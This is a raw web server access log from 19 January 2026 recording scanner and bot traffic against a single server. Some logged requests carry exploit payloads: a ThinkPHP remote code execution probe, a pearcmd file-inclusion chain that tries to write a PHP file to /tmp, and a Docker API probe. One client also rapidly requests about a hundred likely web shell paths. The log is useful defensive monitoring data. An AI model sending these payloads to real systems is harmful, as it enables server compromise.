"/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:33 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:33 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:33 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:40:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 65.49.1.192] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" +[19/Jan/2026:08:41:53 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 65.49.1.192] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" "-" +[19/Jan/2026:08:42:21 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.223.215] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[19/Jan/2026:08:42:22 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 152.32.223.215] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[19/Jan/2026:08:42:22 +0000] 400 - GET http 91.82.83.208 "/robots.txt" [Client 152.32.223.215] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[19/Jan/2026:08:42:23 +0000] 400 - GET http 91.82.83.208 "/sitemap.xml" [Client 152.32.223.215] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[19/Jan/2026:08:42:49 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:43:42 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:08:44:15 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 65.49.1.192] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" +[19/Jan/2026:08:45:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:55:44 +0000] 400 - GET http localhost "/" [Client 176.32.195.85] [Length 252] [Gzip -] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko" "-" +[19/Jan/2026:09:04:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 93.174.95.106] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[19/Jan/2026:09:04:08 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 93.174.95.106] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:09:04:08 +0000] 404 - GET http 91.82.83.208 "/sitemap.xml" [Client 93.174.95.106] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:09:04:09 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 93.174.95.106] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:09:04:09 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:09:24:09 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:09:26:10 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0" "-" +[19/Jan/2026:09:27:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:09:35:13 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:09:37:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:09:48:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:09:58:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[19/Jan/2026:10:06:27 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:10:24:25 +0000] 400 - - http localhost "-" [Client 194.165.16.167] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:10:27:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:10:31:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/eee.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/webadmin.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/galex.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/tinyfilemanager.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/class.api.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/support.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/finley/min.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/dox.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/siteheads.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/0x.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/images/admin.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-logout.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/87.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/0o0.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/lv.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/dropdown.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsheet1.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/about.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/size.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/ms-users.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:31:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/about.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/goods.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/revision.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/12.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/Text/about.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/img.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/tinyfilemanager.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/test1.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/shell20211028.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/ton.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/item.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/lala.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/baxa1.phP8" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/page.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/tempfuns.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/past.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/log.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wen.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/index.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/sf.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//simple.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/admiin.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/9v6.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//doc.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/ha.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/F0x.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/cong.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/a2.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/up4.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/gtc.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/dbc.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/xa.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/content.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/oo.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/info.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws35.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/z60.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-freya.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ccou.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/abc.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ant.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ma.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/gecko.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws29.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/1100.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws46.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws43.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws36.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws34.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/rtx.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/as.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/ova.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/blox.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/vx.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/mh.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/pn.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/O-Simple.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/smklh.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/mans.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/horeg.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/to.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-good.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/fz.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/mini.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:11 +0000] 404 - GET http profibot.direct.quickconnect.to "//x.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxxx.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/moon.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws46.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-22.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "//user.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:12 +0000] 404 - GET http profibot.direct.quickconnect.to "//content.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-ana.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/cwclass.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/87.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/error.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/redi.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/image.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/indo.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/0xx.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/o.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/manager.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/geck.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php?" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/11.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/s.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/sid3.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/ng.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/webix.php?p=" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/az.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/hans.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//403.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//404.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:32:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//buy.php" [Client 4.213.174.69] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:10:33:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:10:46:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:10:47:26 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:11:05:16 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 37.13.105.183] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:11:17:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 23.94.162.106] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[19/Jan/2026:11:18:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:11:20:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:11:20:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] 